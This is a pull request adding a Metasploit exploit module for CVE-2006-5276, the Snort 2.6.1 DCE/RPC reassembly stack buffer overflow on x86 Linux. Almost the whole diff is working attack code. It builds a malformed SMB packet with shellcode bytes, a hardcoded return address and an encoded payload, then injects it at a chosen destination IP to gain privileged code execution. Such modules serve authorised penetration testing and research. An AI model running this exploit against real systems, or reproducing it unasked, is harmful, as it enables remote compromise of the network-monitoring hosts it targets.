### PR TITLE
	new file:   modules/exploits/linux/ids/snortdcerpc.rb

### DIFF
--- a/modules/exploits/linux/ids/snortdcerpc.rb
+++ b/modules/exploits/linux/ids/snortdcerpc.rb
@@ -1,0 +1,145 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+Rank = GreatRanking
+
+include Msf::Exploit::Capture
+
+def initialize(info = {})
+      super(update_info(info,
+      'Name'           => 'Snort 2.6.1. DCE/RPC Packet Reassembly Stack Buffer Overflow (Linux x86)',
+      'Description'    => %q{
+              This exploits the buffer overflow found in Snort 2.6.1 DCE/RPC
+              packet processor. This particular module is capable of
+              exploiting the flaw on x86 Linux systems that do not have the
+              noexec stack option set.
+      },
+      'Author'         => [
+              'Trirat Puttaraksa', #POC
+              '0a29406d9794e4f9b30b3c5d6702c708' #module
+      ],
+      'License'        => MSF_LICENSE,
+      'Version'        => '$Revision: 14774 $',
+      'References'     =>
+      [
+              [ 'CVE', '2006-5276' ],
+              [ 'OSVDB', '32094' ],
+              [ 'BID', '22616' ],
+              [ 'URL', 'http://iss.net/threats/257.html' ],
+              [ 'URL', 'http://sf-freedom.blogspot.com/2007/02/snort-261-dcerpc-preprocessor-remote.html']
+      ],
+      'Privileged'     => true,
+      'Payload'        =>
+      {
+              'BadChars' => "\x00",
+      },
+      'Platform'       => 'linux',
+      'Targets'        =>
+      [
+              [ 'Snort 2.6.1 - Redhat 8',
+              {
+                      'Ret' => 0xbffff120,
+                      'Arch' => [ ARCH_X86 ],
+                      'Space' => 124,
+              }
+              ]
+      ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Feb 19 2007'
+      ))
+      register_options([
+                      OptString.new('INTERFACE', [true, 'The interface to inject the packet','eth0']),
+                      OptAddress.new('DSTIP', [true, 'The destination IP address']),
+                      OptAddress.new('SRCIP', [true, 'The source IP address']),
+
+                      ], self.class)
+
+      deregister_options('FILTER','PCAPFILE','SNAPLEN','TIMEOUT')
+
+      end
+
+      def exploit
+
+      begin
+	      check_pcaprub_loaded
+
+      	# SMB packet borrowed from http://www.milw0rm.com/exploits/3391
+      	# NetBIOS Session Service
+      	smbreq = "\x00\x00\x04\xab"
+
+      	# SMB Header -
+      	smbreq += "\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00"
+      	smbreq += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe"
+      	smbreq += "\x00\x08\x30\x00"
+
+      	# Tree Connect AndX Request
+      	smbreq += "\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00"
+      	smbreq += "\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00"
+      	smbreq += "\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00"
+      	smbreq += "\x3f\x3f\x3f\x3f\x3f\x00"
+
+      	# NT Create AndX Request
+      	smbreq += "\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00"
+      	smbreq += "\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+      	smbreq += "\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00"
+      	smbreq += "\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00"
+      	smbreq += "\x63\x00\x00\x00"
+
+      	# Write AndX Request #1
+      	smbreq += "\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
+      	smbreq += "\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee"
+      	smbreq += "\x05\x00\x0b\x03\x10\x00\x00\x00\x10\x02\x00\x00\x01\x00\x00\x00"
+      	smbreq += "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
+      	smbreq += "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88"
+      	smbreq += "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
+      	smbreq += "\x2b\x10\x48\x60\x02\x00\x00\x00"
+
+      	# Write AndX Request #2
+      	smbreq += "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
+      	smbreq += "\x00\x48\x00\x00\x00\xff\x01\xce\x01\x00\x00\x00\x00\x49\x00\xee"
+      	smbreq += "\xed\x1e\x94\x7c\x90\x81\xc4\xff\xef\xff\xff\x44"
+      	smbreq += "\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa9"
+
+      	# The following address overwrites RET and points into our shellcode
+      	smbreq += [target.ret].pack('V')
+      	smbreq += "\xcc" * 16 #pad
+      	smbreq += "\x90" * 4  #land
+      	enc = payload.encoded
+      	smbreq += enc
+      	smbreq += "\x90" * (334 - enc.length) #pad
+
+      	p = PacketFu::TCPPacket.new
+      	p.ip_saddr = datastore['SRCIP']
+      	p.ip_daddr = datastore['DSTIP']
+      	p.tcp_sport = 139
+      	p.tcp_flags.ack = 1
+      	p.tcp_flags.psh = 1
+      	p.tcp_dport = 139
+      	p.tcp_win = 3072
+      	p.payload = smbreq
+      	p.recalc
+      	p
+
+      	print_status("Sending DCE/RPC packet from #{p.ip_saddr}:#{p.tcp_sport} to #{p.ip_daddr}:#{p.tcp_dport} ")
+      	open_pcap
+      	interface = datastore['INTERFACE']
+      	capture.inject(p.to_s)
+      	close_pcap
+
+      	rescue ::Exception => e
+          print_error("Failed: #{e}")
+      	end
+      end
+
+end


### PR DESCRIPTION
New metasploit module - CVE-2006-5276, Snort 2.6.1. DCE/RPC Packet Reassembly Stack Buffer Overflow (Linux x86) 
